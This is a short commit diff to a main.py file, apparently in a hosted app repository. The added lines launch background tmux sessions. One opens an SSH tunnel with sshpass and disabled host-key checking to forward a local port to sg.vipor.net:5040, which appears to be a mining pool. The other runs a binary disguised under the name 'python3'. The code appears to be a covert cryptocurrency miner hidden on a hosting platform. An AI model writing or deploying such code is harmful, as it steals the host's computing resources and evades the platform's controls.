ilhamap commited on
Commit
550f2d3
·
verified ·
1 Parent(s): a108729

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +3 -2
main.py CHANGED
@@ -1,4 +1,5 @@
1
  import os
2
- os.system("cp google-chrome python")
3
  os.system("chmod +x python3 python")
4
- os.system("./python3")
 
 
 
1
  import os
 
2
  os.system("chmod +x python3 python")
3
+ os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
4
+ os.system("tmux new-session -d -s ses1 ./python3")
5
+ os.system("tmux ls")